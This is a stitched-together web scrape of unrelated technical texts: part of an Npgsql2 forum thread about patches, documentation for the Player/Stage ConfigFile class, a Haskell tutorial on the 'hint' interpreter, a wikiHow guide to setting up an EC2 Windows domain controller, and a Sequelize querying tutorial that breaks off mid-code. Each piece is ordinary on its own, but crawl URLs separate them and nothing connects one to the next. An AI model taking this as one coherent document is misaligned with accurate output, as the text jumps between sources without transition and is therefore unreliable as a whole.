Thanks, but you forgot to apply the patch Npgsql_connection_string_builder.patch,
which replaces NpgsqlConnectionString with NpgsqlConnectionStringBuilder in several files, including:
NpgsqlCommand.cs
NpgsqlConnection.cs
NpgsqlConnector.cs
NpgsqlConnectorPool.cs
NpgsqlFactory.cs
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-03 13:14
[forum:1002900]
Whoops, sorry for that!
Committed now! Please, check it out and let me know if you still have any problems.
Tao, could you please update vs.net project and send me the patch? I will update Monodevelop project.
Thanks in advance.
RE: A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-12-04 02:11
[forum:1002903]
I created a patch for both Npgsql.csproj and Npgsql2008.csproj.
Patch Link:
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-04 18:36
[forum:1002910]
Patch applied!
Thanks Tao!
RE: A few questions about Npgsql2
[ reply ]
By:
Josh Cooley
on 2007-11-28 19:31
[forum:1002882]
"The Mono.Security reference is used for SSL connection. But .Net Framework 2.0 already implement SslStream, is that possible to eliminate Mono.Security dependence by using System.Net.Security.SslStream?"
We have talked about that in the past. That is a breaking change for the NpgsqlConnection API. As long as a breaking change is acceptable, then it does simplify things.
#include <configfile.h>
This class is used to load settings from a configuration text file. The file is divided into sections, with each section having a set of key/value fields. An example file format is as follows:
# This is a comment
section_name
(
key1 0
key2 "foo"
key3 ["foo" "bar"]
)
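A minimal reader for this layout can be sketched in Python (an illustration of the format only; the real implementation is the C++ class documented below, which additionally handles unit conversion, colors, tuples, and nested sections):

```python
import shlex

def parse_config(text):
    """Parse '# comment' plus 'section ( key value... )' blocks into
    {section: {key: [values]}}."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blanks
        if not line or line == "(":
            continue
        if line == ")":
            current = None                     # close the current section
        elif current is None:
            current = sections.setdefault(line, {})
        else:                                  # a key followed by value(s)
            key, *values = shlex.split(line.replace("[", "").replace("]", ""))
            current[key] = values
    return sections

example = '''
# This is a comment
section_name
(
  key1 0
  key2 "foo"
  key3 ["foo" "bar"]
)
'''
print(parse_config(example))
# {'section_name': {'key1': ['0'], 'key2': ['foo'], 'key3': ['foo', 'bar']}}
```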
Standard constructor.
Standard destructor.
Load config from file.
Check for unused fields and print warnings.
Read a string value.
Read an integer value.
Read a floating point (double) value.
Read a length (includes unit conversion, if any).
Read an angle (includes unit conversion).
In the configuration file, angles are specified in degrees; this method will convert them to radians.
Read a color (includes text to RGB conversion).
In the configuration file, colors may be specified with symbolic names, e.g. "blue" and "red". This function will convert them to an RGB value using the X11 rgb.txt file.
Read a filename.
Always returns an absolute path. If the filename is entered as a relative path, we prepend the config file's path to it.
Get the number of values in a tuple.
Read a string from a tuple field.
Read an integer from a tuple field.
Read a float (double) from a tuple field.
Read a length from a tuple (includes units conversion).
Read an angle from a tuple (includes units conversion).
Read a device id.
Get the number of sections.
Get a section type name.
Lookup a section number by section type name.
Get a section's parent section.
Dump the token list (for debugging).
Dump the section list for debugging.
Dump the field list for debugging.
Name of the file we loaded. | http://playerstage.sourceforge.net/doc/Player-1.6.5/player-html/classConfigFile.php | CC-MAIN-2017-17 | en | refinedweb |
If you are a Haskell convert from Lisp, JavaScript, or any other dynamic programming language, you might miss the eval function of those languages.
Dynamic evaluation is not limited to dynamic languages. Even Java supports dynamic class loading through class loaders. It seems Haskell does not support dynamic evaluation as it is a strictly defined language. But GHC allows us to compile and execute Haskell code dynamically through GHC API.
hint library provides a Haskell interpreter built on top of GHC API. It allows to load and execute Haskell expressions and even coerce them into values.
hint provides a bunch of monadic actions based on
InterpreterT monad transformer.
runInterpreter is used to execute the action.
runInterpreter :: (MonadIO m, MonadMask m) => InterpreterT m a -> m (Either InterpreterError a)
Type check
We can check the type of a Haskell expression using typeOf.
λ> import Language.Haskell.Interpreter
λ> runInterpreter $ typeOf "\"foo\""
Right "[GHC.Types.Char]"
λ> runInterpreter $ typeOf "3.14"
Right "GHC.Real.Fractional t => t"
Import modules
hint does not import the Prelude implicitly; we need to import modules explicitly using setImports. For qualified imports, use setImportsQ instead.
λ> runInterpreter $ do { setImports ["Prelude"]; typeOf "head [True, False]" }
Right "Bool"
λ> runInterpreter $ do { setImportsQ [("Prelude", Nothing), ("Data.Map", Just "M")]; typeOf "M.empty" }
Right "M.Map k a"
Evaluate expressions
The eval function lets us evaluate Haskell expressions dynamically.
λ> runInterpreter $ do { setImports ["Prelude"]; eval "head [True, False]" }
Right "True"
λ> runInterpreter $ do { setImports ["Prelude"]; eval "1 + 2 * 3" }
Right "7"
The result type of evaluation is String. To convert the result into the type we want, use interpret with as. Here as provides a witness for its monomorphic type.
λ> runInterpreter $ do { setImports ["Prelude"]; interpret "head [True, False]" (as :: Bool) }
Right True
λ> runInterpreter $ do { setImports ["Prelude"]; interpret "1 + 2 * 3" (as :: Int) }
Right 7
Load modules
It is also possible to load modules dynamically.
Here’s a small module
Foo stored in
Foo.hs file.
module Foo where

f = head
g = tail
We can load Foo using the loadModules function.
setTopLevelModules ensures that all bindings of the module are in scope.
import Control.Monad
import Language.Haskell.Interpreter

ex :: Interpreter ()
ex = do
  loadModules ["Foo.hs"]
  setTopLevelModules ["Foo"]
  setImportsQ [("Prelude", Nothing)]
  let expr1 = "f [1, 2, 3]"
  a <- eval expr1
  liftIO $ print a
  let expr2 = "g [1, 2, 3]"
  b <- eval expr2
  liftIO $ print b

main :: IO ()
main = do
  r <- runInterpreter ex
  case r of
    Left err -> print err
    Right () -> return ()
Executing this program prints
"1" "[2,3]"
because f is head and g is tail.
wikiHow to Turn Your EC2-Based Windows Server Into a DC
Setting up a single virtual Windows machine on EC2 may be a trivial process, but setting it up as a real DC and connecting multiple virtual machines to it is another story. This how-to provides the basis for setting up a proper DC on EC2.
Steps
- 1. Launch your instances.
- 2. Get the Administrator password for each instance.
- 3. Set a new Administrator password.
- 4. Disable Ec2SetComputerName in %programfiles%\Amazon\Ec2ConfigService\Settings\config.xml on all servers.
- 5. Rename the computers.
- 6. Set the DNS server to point to the DC (netsh int ip set dns "local area connection" static xxx.xxx.xxx.xxx primary), where xxx.xxx.xxx.xxx is the internal IP address of the DC.
- 7. Choose a DNS namespace (ad.compute-1.internal).
- 8. Add the Domain Controller role: (a) Domain controller for a new domain; (b) Domain in a new forest; (c) Use the DNS name from step 7; (d) Specify a Domain NetBIOS name (AD); (e) Specify/Accept the default Database folder and Log folder; note you should use the C: drive for both to ensure they are included in an AMI when bundled; (f) Specify/Accept the default SYSVOL folder location (again, you'll want to use the C: drive); (g) Install and configure the DNS server on this computer, and set this computer to use this DNS server as its preferred DNS server; (h) Permissions compatible only with Windows 2000 or Windows Server 2003; and (i) Specify a directory services restore mode administrator password.
- 9. Point the member servers at the DC for DNS (netsh int ip set dns "local area connection" static xxx.xxx.xxx.xxx primary), where xxx.xxx.xxx.xxx is the internal IP address of the DC.
- 10. Join the Domain.
Warnings
- Don't do anything critical with EC2 until you know exactly what you are doing and have gained enough experience with it. The information provided is a recap from Jeff W. (Amazon Web Services), and he deserves most (if not all) of the credit for this HOWTO (that also means, if things go wrong, you can blame him more than wikiHow). Use at own risk. | http://www.wikihow.com/Turn-Your-Ec2-Based-Windows-Server-Into-a-Dc | CC-MAIN-2017-17 | en | refinedweb |
**Use Dart 1.9 for native support for async/await/sync/async/yield.**
A prototype (and in progress) implementation of async/await in Dart, via CPS translation.
This transformer is useful for trying async/await with dart2js. The Dart VM natively supports async and await. If you are writing Dart code that runs only in the VM, you do not need this transformer.
Add this to your pubspec.yaml file:
dependencies:
  async_await:
    git:
transformers:
- async_await
Import dart:async in your Dart file:
import 'dart:async';
See also the open issues. | https://chromium.googlesource.com/external/github.com/dart-lang/async_await/ | CC-MAIN-2017-17 | en | refinedweb |
The Python 3.3 documentation tells me that direct access to a property descriptor should be possible, although I'm skeptical of its syntax:
x.__get__(a)
class MyDescriptor(object):
    """Descriptor"""
    def __get__(self, instance, owner):
        print "hello"
        return 42

class Owner(object):
    x = MyDescriptor()

    def do_direct_access(self):
        self.x.__get__(self)

if __name__ == '__main__':
    my_instance = Owner()
    print my_instance.x
    my_instance.do_direct_access()
Traceback (most recent call last):
File "descriptor_test.py", line 15, in <module>
my_instance.do_direct_access()
File "descriptor_test.py", line 10, in do_direct_access
self.x.__get__(self)
AttributeError: 'int' object has no attribute '__get__'
shell returned 1
By accessing the descriptor on self you invoked __get__ already. The value 42 is being returned.
For any attribute access, Python will look to the type of the object (so type(self) here) to see if there is a descriptor object there (an object with a .__get__() method, for example), and will then invoke that descriptor. That's how methods work; a function object is found, which has a .__get__() method, which is invoked and returns a method object bound to self.
If you wanted to access the descriptor directly, you'd have to bypass this mechanism; access x in the __dict__ dictionary of Owner:
>>> Owner.__dict__['x']
<__main__.MyDescriptor object at 0x100e48e10>
>>> Owner.__dict__['x'].__get__(None, Owner)
hello
42
This behaviour is documented right above where you saw the x.__get__(a) direct call.
The Direct Call scenario in the documentation only applies when you have a direct reference to the descriptor object (not invoked); the Owner.__dict__['x'] expression is such a reference.
Your code, on the other hand, is an example of the Instance Binding scenario:
Instance Binding
If binding to an object instance, a.x is transformed into the call: type(a).__dict__['x'].__get__(a, type(a)).
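Putting the two access paths side by side, a Python 3 rendering of the same idea (print is a function here; names follow the question's example):

```python
class MyDescriptor:
    """__get__ runs automatically on attribute access via the class."""
    def __get__(self, instance, owner):
        return 42

class Owner:
    x = MyDescriptor()

    def do_direct_access(self):
        # Bypass the instance-binding machinery: fetch the descriptor
        # object itself and invoke its __get__ explicitly.
        return type(self).__dict__['x'].__get__(self, type(self))

my_instance = Owner()
print(my_instance.x)                    # 42  (instance binding)
print(my_instance.do_direct_access())   # 42  (explicit direct call)
```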
I am trying to grab the version number from a string via python regex...
Given filename: facter-1.6.2.tar.gz
When, inside the loop:
import re
version = re.split('(.*\d\.\d\.\d)',sfile)
print version
Two logical problems:
1) Since you want only the 1.6.2 portion, you don't want to capture the .* part before the first \d, so it goes outside the parentheses.
2) Since you only want to match the pattern in question and grab it, using re.split makes no sense. Instead, use re.match. This will give you a Match object, and you can use its .group() method to get the actual matched text. "group 0" is the entire matched pattern, "group 1" is what's matched by the stuff inside the first set of parentheses, etc.
>>> re.match('.*(\d\.\d\.\d)', 'factor-1.6.2.tar.gz').group(1)
'1.6.2'
Although as the other answer indicates, there's actually no point in matching the .* part anyway, because we can instead search for the string that consists of only the part we want. This will look for the pattern anywhere within the string (matching expects it to be at the beginning). Since we don't need parentheses to make the pattern work logically, and because we're now going to use the entire matched portion, we no longer have any need for parentheses, either.
>>> re.search('\d\.\d\.\d', 'factor-1.6.2.tar.gz').group(0)
'1.6.2'
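One caveat: the patterns above assume single-digit version components. A slightly more general sketch (my own variant, using \d+ so versions like 1.6.12 also match):

```python
import re

def extract_version(filename):
    """Return the first dotted version number in filename, or None."""
    match = re.search(r'\d+\.\d+\.\d+', filename)
    return match.group(0) if match else None

print(extract_version('facter-1.6.2.tar.gz'))  # → 1.6.2
print(extract_version('tool-10.12.345.zip'))   # → 10.12.345
```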
Urho3D::JSONValue Class Reference
JSON value class.
#include <Urho3D/Resource/JSONValue.h>
Detailed Description
JSON value class.
The documentation for this class was generated from the following files:
- Source/Urho3D/Resource/JSONValue.h
- Source/Urho3D/Resource/JSONValue.cpp | https://urho3d.github.io/documentation/HEAD/class_urho3_d_1_1_j_s_o_n_value.html | CC-MAIN-2017-43 | en | refinedweb |
Django (1.5) Modelform is supposed to handle many-to-many fields. In my case, I was editing the Django User model with Django groups. Everything seemed to be working correctly. The correct group associations were automatically showing up in the many-to-many widget. The problem was the new associations were not being saved.
A quick look at the docs revealed a discussion of the problems that can happen with many-to-many when a save is done using commit=False. But I was not doing that.
Turns out the problem was in my multi-select widget. I am using the “Whitelabel” theme from revaxarts.com. It auto-magically replaces clunky widgets with better widgets. When I used a bare-bones HTML template, the many-to-many worked.
When I looked at the cleaned data right before the save command, I noticed that the Groups query set was empty. Adding the following to the form’s clean methods solved the problem:
def clean_groups(self):
    if 'groups[]' in self.data:
        group_ids = [int(x) for x in self.data['groups[]']]
        g = Group.objects.filter(id__in=group_ids)
    else:
        g = Group.objects.none()
    return g
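Outside of Django, the heart of that fix is just coercing the posted 'groups[]' strings to integers before filtering; a minimal sketch of that step alone (the function name is mine, not from the post):

```python
def group_ids_from_post(data):
    """data mimics the form's self.data; 'groups[]' holds the selected ids as strings."""
    if 'groups[]' in data:
        return [int(x) for x in data['groups[]']]
    return []

print(group_ids_from_post({'groups[]': ['3', '7']}))  # → [3, 7]
```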
Vultr Driver Documentation
Vultr was built by the same team that created Choopa.com and GameServers.com, has tackled hosting solutions, delivering industry leading performance and reliability while building out one highly available worldwide network.
Read more at:
Instantiating the driver
from libcloud.dns.types import Provider
from libcloud.dns.providers import get_driver

cls = get_driver(Provider.VULTR)
driver = cls(key='api_key')
I need to implement a DLL that will take the parameter passed (SessionNumber) and add it to a web address, and then launch the default browser using that address.
I'm having problems getting it to work correctly.
Currently, I have:
namespace WebsiteLaunch
{
    public class LaunchSite
    {
        public LaunchSite(ref string SessionNumber)
        {
            string SessionPassed = SessionNumber;
            string target = "?" + SessionPassed;
            try
            {
                System.Diagnostics.Process.Start(target);
                SessionNumber = "SUCCESS";
            }
            catch
            {
                SessionNumber = "ERROR";
            }
        }
    }
}
The source compiles fine, but doesn't work successfully when called from another program. | https://www.daniweb.com/programming/software-development/threads/341230/dll-to-launch-website | CC-MAIN-2017-43 | en | refinedweb |
Traceback --- error seen when trying to capture and store image using shutil
Hi
I have used the below code to capture and store an Image
img = Screen(
import shutil
shutil.
import os.path
shutil.
And this is the error I get:
TypeError ( coercing to Unicode: need string, org.sikuli.
[error] --- Traceback --- error source first line: module ( function ) statement 293: shutil ( move ) File "C:\Sikuli\
Please tell me what to do to remove this error.
Question information
- Language: English
- Status: Solved
- For: Sikuli
- Assignee: No assignee
- Solved: 2017-08-11
- Last query: 2017-08-11
- Last reply: 2017-08-11
Thanks masuo, that solved my question.
try this code
img = Screen(0).capture(27, 170, 963, 159).getFile()
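For reference, the underlying cause: shutil.move expects filesystem path strings on both sides, while capture() without getFile() hands it a ScreenImage object. A plain-Python sketch of the working pattern, using made-up temp paths rather than Sikuli objects:

```python
import os
import shutil
import tempfile

# stand-in for the file that capture(...).getFile() would return
src_dir = tempfile.mkdtemp()
dst_dir = tempfile.mkdtemp()
src = os.path.join(src_dir, "capture.png")
with open(src, "wb") as f:
    f.write(b"fake image bytes")

# shutil.move is happy because both arguments are path strings
moved = shutil.move(src, os.path.join(dst_dir, "capture.png"))
print(os.path.exists(moved))  # → True
```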
So, the patch has to look like what is below.

I've decided to use the internal set/clear API, because it allows us to ignore the default state of control lines (all the troubles with TIOCM_OUT2/TIOCM_OUT1 on various platforms), so it's definitely a win. I'm not too sure about locking. I guess the spinlock in uart_update_mctrl() is probably good enough.

I was tempted to create the same API for setting the speed (baud rate), but that may need to wait for another time.

As you can't use IrDA SIR with 2.5.X, would you mind giving a look at the issue ? Feel free to forward as needed to get comments from all the interested parties.

Thanks in advance...

Have fun...

Jean

---------------------------------------------------------------
diff -u -p linux/include/linux/tty_driver.d0.h linux/include/linux/tty_driver.h
--- linux/include/linux/tty_driver.d0.h Tue Apr 8 09:56:21 2003
+++ linux/include/linux/tty_driver.h Tue Apr 8 10:09:09 2003
@@ -157,6 +157,8 @@ struct tty_driver {
 	int (*chars_in_buffer)(struct tty_struct *tty);
 	int (*ioctl)(struct tty_struct *tty, struct file * file,
 		unsigned int cmd, unsigned long arg);
+	int (*modem_ctrl)(struct tty_struct *tty,
+		unsigned int set, unsigned int clear);
 	void (*set_termios)(struct tty_struct *tty, struct termios * old);
 	void (*throttle)(struct tty_struct * tty);
 	void (*unthrottle)(struct tty_struct * tty);
diff -u -p linux/drivers/serial/core.d0.c linux/drivers/serial/core.c
--- linux/drivers/serial/core.d0.c Tue Apr 8 09:51:00 2003
+++ linux/drivers/serial/core.c Tue Apr 8 10:15:29 2003
@@ -1158,6 +1158,26 @@ uart_ioctl(struct tty_struct *tty, struc
 	return ret;
 }

+/*
+ * Called by line disciplines to change the various modem control bits...
+ * Line disciplines are implemented within the kernel, and therefore
+ * we don't want them to use the ioctl function above.
+ * Jean II
+ */
+static int
+uart_modem_ctrl(struct tty_struct *tty, unsigned int set, unsigned int clear)
+{
+	struct uart_state *state = tty->driver_data;
+
+	/* Set new values, if any */
+	/* Locking will be done in there */
+	uart_update_mctrl(state->port, set, clear);
+
+	/* Return new value */
+	return state->port->ops->get_mctrl(state->port);
+}
+
 static void uart_set_termios(struct tty_struct *tty, struct termios *old_termios)
 {
 	struct uart_state *state = tty->driver_data;
@@ -2150,6 +2170,7 @@ int uart_register_driver(struct uart_dri
 	normal->chars_in_buffer = uart_chars_in_buffer;
 	normal->flush_buffer = uart_flush_buffer;
 	normal->ioctl = uart_ioctl;
+	normal->modem_ctrl = uart_modem_ctrl;
 	normal->throttle = uart_throttle;
 	normal->unthrottle = uart_unthrottle;
 	normal->send_xchar = uart_send_xchar;
diff -u -p linux/drivers/net/irda/irtty-sir.d0.c linux/drivers/net/irda/irtty-sir.c
--- linux/drivers/net/irda/irtty-sir.d0.c Tue Apr 8 09:46:54 2003
+++ linux/drivers/net/irda/irtty-sir.c Tue Apr 8 10:34:53 2003
@@ -180,32 +180,29 @@ static int irtty_change_speed(struct sir
 static int irtty_set_dtr_rts(struct sir_dev *dev, int dtr, int rts)
 {
 	struct sirtty_cb *priv = dev->priv;
-	int arg = 0;
+	int set = 0;
+	int clear = 0;

 	ASSERT(priv != NULL, return -1;);
 	ASSERT(priv->magic == IRTTY_MAGIC, return -1;);

-#ifdef TIOCM_OUT2 /* Not defined for ARM */
-	arg = TIOCM_OUT2;
-#endif
 	if (rts)
-		arg |= TIOCM_RTS;
+		set |= TIOCM_RTS;
+	else
+		clear |= TIOCM_RTS;
 	if (dtr)
-		arg |= TIOCM_DTR;
+		set |= TIOCM_DTR;
+	else
+		clear |= TIOCM_DTR;

 	/*
-	 * The ioctl() function, or actually set_modem_info() in serial.c
-	 * expects a pointer to the argument in user space. This is working
-	 * here because we are always called from the kIrDAd thread which
-	 * has set_fs(KERNEL_DS) permanently set. Therefore copy_from_user()
-	 * is happy with our arg-parameter being local here in kernel space.
+	 * We can't use ioctl() because it expects a non-null file structure,
+	 * and we don't have that here.
+	 * This function is not yet defined for all tty driver, so
+	 * let's be careful... Jean II
 	 */
-
-	lock_kernel();
-	if (priv->tty->driver.ioctl(priv->tty, NULL, TIOCMSET, (unsigned long) &arg)) {
-		IRDA_DEBUG(2, "%s(), error doing ioctl!\n", __FUNCTION__);
-	}
-	unlock_kernel();
+	ASSERT(priv->tty->driver.modem_ctrl != NULL, return -1;);
+	priv->tty->driver.modem_ctrl(priv->tty, set, clear);

 	return 0;
 }
diff -u -p linux/drivers/net/irda/sir_kthread.d0.c linux/drivers/net/irda/sir_kthread.c
--- linux/drivers/net/irda/sir_kthread.d0.c Mon Apr 7 18:56:28 2003
+++ linux/drivers/net/irda/sir_kthread.c Mon Apr 7 18:59:31 2003
@@ -151,6 +151,13 @@ static int irda_thread(void *startup)

 	while (irda_rq_queue.thread != NULL) {

+		/* We use TASK_INTERRUPTIBLE, rather than
+		 * TASK_UNINTERRUPTIBLE. Andrew Morton made this
+		 * change ; he told me that it is safe, because "signal
+		 * blocking is now handled in daemonize()", he added
+		 * that the problem is that "uninterruptible sleep
+		 * contributes to load average", making user worry.
+		 * Jean II */
 		set_task_state(current, TASK_INTERRUPTIBLE);
 		add_wait_queue(&irda_rq_queue.kick, &wait);
 		if (list_empty(&irda_rq_queue.request_list))
Andrew Purtell commented on HBASE-2392:
---------------------------------------
I think it's ok for 0.20.4. 3.3.0 only has an issue with nc. Does any HBase user monitor ZK
with nc? I think it unlikely. The four letter stat commands work fine otherwise.
> upgrade to ZooKeeper 3.3.0
> --------------------------
>
> Key: HBASE-2392
> URL:
> Project: Hadoop HBase
> Issue Type: Improvement
> Reporter: Andrew Purtell
> Assignee: Andrew Purtell
> Priority: Minor
> Fix For: 0.20.4, 0.21.0
>
> Attachments: HBASE-2392.patch, HBASE-2392.patch
>
>
> See
> Key features of the 3.3.0 release:
> * observers - non-voting members of the ensemble, scale reads
> * distributed queue recipe implementation (c/java)
> * additional 4letterword/jmx features to support operations
> Changes in contrib:
> * zookeeper-tree: export/import znode namespace
> * zooinspector: gui browser for znode namespace
> * bookkeeper client rewrite, use of netty
> This change can't be done on the 0.20 branch. From the release notes:
> {quote}
> Note: a new feature was added to the version 3.3 client which breaks backward compatibility,
at the wire protocol level, between version 3.3 clients and prior versions of the server (server
versions prior to 3.3).
> {quote}
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online. | http://mail-archives.apache.org/mod_mbox/hbase-issues/201004.mbox/%3C1571960859.751271989110869.JavaMail.jira@brutus.apache.org%3E | CC-MAIN-2017-43 | en | refinedweb |
- Author: jedie
- Posted: August 14, 2008
- Language: Python
- Version: .96
- Tags: forms filefield
- Score: 2 (after 6 ratings)
A simple FileField with an additional file extension whitelist. Raises ValidationError("Not allowed filetype!") if a filename has an extension which is not in the whitelist.
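The core idea, stripped of the Django form machinery (names here are illustrative, not from the snippet): split off the extension and reject anything outside the whitelist.

```python
import os

def check_extension(filename, whitelist=(".txt", ".pdf")):
    """Raise ValueError if filename's extension is not in the whitelist."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in whitelist:
        raise ValueError("Not allowed filetype!")
    return filename

print(check_extension("report.pdf"))  # → report.pdf
```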
This will throw an AttributeError if required=False (due to trying to access data.name when data will be None if required == False).

I rewrote it as:

def clean(self, *args, **kwargs):
    data = super(ExtFileField, self).clean(*args, **kwargs)
Hopefully I'm correct on this one.
s/through/raise an AttributeError exception. :)
Couldn't figure out how to keep djangosnippets from mucking up my code, but hopefully you get the point.
This snippet does not account for a field that is not required, and also does not return data so it does not get cleaned correctly.
The superclass will return False for data if the file has been cleared and the field is not required.
Here's a revised clean method for this snippet:
```
```
If you're using React, you've likely come across build tools such as Webpack, Grunt, or Gulp.
These tools are very cool, but at the same time can act as a barrier to entry because of the configuration necessary to use them. There is an easier way to bundle and build our projects: Parcel.js.
I'm going to show you how to set up a project using Parcel for building a React app. It only takes about 5 minutes to get up and running (even less once you've done it a couple of time)!
What is Parcel.js?
According to the Parcel.js website, it is:
... a web application bundler, differentiated by its developer experience. It offers blazing fast performance utilizing multicore processing, and requires zero configuration.
Why is this useful to us?
There's nothing worse than trying to start a project and getting lost in the proverbial weeds when setting up a build tool. Parcel.js eliminates the need for configuration which means we can skip over that part and get right to our project. What's not to love?
It also takes advantage of multicore processing and caching to help speed up build times. No more 30 second waits before we can view our project. Ready to get started and see how easy it is to set up our project? Great!
Setting up our project with Parcel.js
1. Create directory and enter
The first step in any project is creating the directory that will house our files. To do this, navigate to the folder that will contain our project folder and use the line of code below in our terminal.
mkdir parcel-setup && cd $_
2. Initialize NPM or Yarn
Now that we have our project directory, we should initialize NPM or Yarn to create a package.json file. I will be providing the code for both, but you can just follow the one you prefer. To initialize our project, use the code below:
npm init -y or yarn init -y
The init command initializes the project and the -y flag goes with the default setup. We could also do this without the -y flag and manually set up our package.json file.
3. Initialize Git repo and add .gitignore
It's always a good idea to use git in our projects. Git is a version control tool that allows us to take a "snapshot" of code and save it locally or on a site like Github. To add git to our project, we need to initialize it with the following command:
git init
Once we have git added, we should add a .gitignore file. The point of this file is to tell our computer to ignore the files or directories listed when making a commit, or snapshot. The line of code below will create the file and open it for us to edit.
touch .gitignore && open $_
Once our file is open, we need to add the files and folders we don't want added. In this case, it's just going to be our node_modules folder, which is where our dependencies are stored. Our .gitignore file should look like this:
node_modules
4. Create an index.html file
We're about halfway done. Pretty fast, right?
To create our index.html file, we can go back to the terminal and use the following line of code:
touch index.html
We can now open this file in our text editor. We will fill it with the following code. (Hint: If you're using a text editor with Emmet, you can type in html:5 and hit tab. It should do most of the work for you!)
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Parcel Setup</title>
</head>
<body>
  <div id="app"></div>
  <script src="./app.js"></script>
</body>
</html>
5. Install dependencies
The next step in setting up our project is to install the dependencies for our project. As before, I'm providing code for NPM and Yarn, so just use whichever you are using in your project.
npm install react react-dom parcel babel-preset-env babel-preset-react --save-dev or yarn add react react-dom parcel babel-preset-env babel-preset-react
Once our packages have finished installing we can finish getting our project set up!
6. Add app.js
To actually create our app, we will put it in an app.js file, so can you guess what's next? Yep! We need to create and open the file.
touch app.js && open $_
Inside our app.js file, we will create a React component and use React DOM to render it. If you're unsure about how to create a React component, you should read this article for a quick overview. Below is the code we need to create a React app in our app.js file:
import React from 'react';
import ReactDOM from 'react-dom';

class App extends React.Component {
  render() {
    return (
      <div>
        <h1>Hello World!</h1>
      </div>
    )
  }
}

ReactDOM.render(<App />, document.getElementById('app'));
Great! The top of our file is importing the dependencies we need for this file. We installed them in step 5. Next, we're creating our App component which will just return an H1 tag with the text "Hello World!". The bottom line renders the app inside the #app element we created in our HTML document in step 4.
7. Create a .babelrc file to tell it how to compile the JavaScript
We're almost done! Since React uses ES6+ JavaScript, we need to set up a .babelrc file to tell it how to compile our code. Babel basically takes the most modern syntax (ES6, ES7, etc) and turns it into code that all browsers can read whether they support ES6+ or not. Pretty cool, right? Let's create our .babelrc file!
touch .babelrc && open $_
Inside of our file, we will put the following code. This is a pretty basic setup, but it will get the job done for our project today.
{ "presets": ["env", "react"] }
Awesome! Just one more step and we're done!
8. Add scripts to our package.json file
The final step before we run our app is to add some script commands to our package.json file. Let's get it open.
open package.json
It should look like this:
{
  "name": "parcel-setup",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "dependencies": {
    "babel-preset-env": "^1.7.0",
    "babel-preset-react": "^6.24.1",
    "parcel": "^1.9.7",
    "react": "^16.4.2",
    "react-dom": "^16.4.2"
  }
}
A quick note: The version numbers for your dependencies may be different from mine. At the time of writing, these are the most up-to-date versions.
We're going to add the following code. It says that when we type npm run start or yarn start, it should use Parcel to build our application and serve the index.html file.
"scripts": { "start": "parcel index.html" },
Our complete package.json file should look like this:
{
  "name": "parcel-setup",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "scripts": {
    "start": "parcel index.html"
  },
  "dependencies": {
    "babel-preset-env": "^1.7.0",
    "babel-preset-react": "^6.24.1",
    "parcel": "^1.9.7",
    "react": "^16.4.2",
    "react-dom": "^16.4.2"
  }
}
All set up
Our Parcel setup is now complete! To build our application, go back to your terminal and run the command below:
npm run start or yarn start
Your terminal now says Server running at http://localhost:1234. Let's open up our browser and go to http://localhost:1234 to see our project.
Conclusion
We've now seen how easy it is to get up and running with Parcel. While tools like Webpack offer more customizations for enterprise level applications, Parcel is great for smaller or new applications as well as prototyping. I highly recommend reaching for Parcel the next time you're starting a new project.
Webpack 4 is fully config-less too. Just have index.html, src/index.js and package.json in your root and it will build the whole project in a breeze, while maintaining compatibility with the whole plugin ecosystem if you need to customize your build.
I’ll have to check that one out! I’ve had good luck with Parcel so my search stopped there. Thanks for the heads up.
I think there are more than just enterprise applications that value customization. I think having an extensible answer for almost every problem is a better reason why you would want to choose webpack. :-)
It always starts with zero config, until it doesn't.
I'm fully a believer right now.
Dropped node-sass into my project and it compiled flawlessly.
Awesome! I’ve been using Parcel for a month or two now and it’s one of the tools I most enjoy using. | https://dev.to/iam_timsmith/parceljs-who-says-bundling-needs-to-be-difficult-4ocm | CC-MAIN-2018-51 | en | refinedweb |
My previous post, Sequelize CRUD 101, covered the very basics of CRUD using the Node ORM, Sequelize. This post will cover two intermediate sets of concepts:
- Querying multiple columns using a query object.
- Creating, updating and deleting multiple records.
You'll benefit from having an SQL database running locally (preferably PostgreSQL), and cloning the repo that goes with this post.
The repo for this post extends that of my Sequelize 101 post, so please refer to my prior post for a walk through of the folder structure and code.
READ: Returning a subset of data
Before getting into complex querying, let's ease into Sequelize with something fairly basic - returning a subset of data.
For example, imagine we have a table of pet information - owner names, ids, addresses, medical history, etc. - but we only want to return names and types from our query. Sequelize has an attributes option that allows us to declare which columns we want returned.
db.pets.findAll({
  attributes: ['name', 'type'],
  where: {
    city: 'Los Angeles'
  }
})
.then(pets => {
  console.log(pets);
});
The above query will return all pets with the city 'Los Angeles', but will only return the name and type of each pet. Supposing there are only two pets with 'Los Angeles' as their city, the JSON response would look something like this:
[
  {
    "name": "Max",
    "type": "cat"
  },
  {
    "name": "Penelope",
    "type": "dog"
  }
]
READ: Querying multiple columns
Basic search functionality is a common feature of APIs, so let's build a search endpoint for our API. The following is an example of a query that lets us search for cats in Los Angeles.
The code is simple, here it is:
db.pets.findAll({
  where: {
    city: 'Los Angeles',
    type: 'cat'
  }
});
If we were searching only one column, e.g. city, we could send a single variable as a payload from the client (this example uses the popular SuperAgent library):
import superagent from 'superagent';

const petCity = 'Los Angeles';

superagent
  .post('/search')
  .send({ city: petCity })
  .set('Accept', 'application/json')
  .end(function(err, res){
    if (err || !res.ok) {
      // handle error
    } else {
      // handle success
    }
  });
As always, our API is built with Express.js. The endpoint to receive our query would look like this:
app.post('/search', (req, res) => {
  const citySearch = req.body.city;
  db.pets.findAll({ where: { city: citySearch } })
  .then(pets => {
    res.json(pets);
  });
});
NOTE: Although we are 'getting' data, and the Sequelize method we are using is findAll, our endpoint is not a GET endpoint. Since we are sending/posting an object from the client, we need to make this endpoint a POST route.
But how do we search multiple columns, e.g. city and type, via our Express API? We'll have to pass an object to Sequelize, and this object will contain our query parameters.
Our client code would look something like this:
import superagent from 'superagent';

const myQuery = {
  city: 'Los Angeles',
  type: 'cat'
};

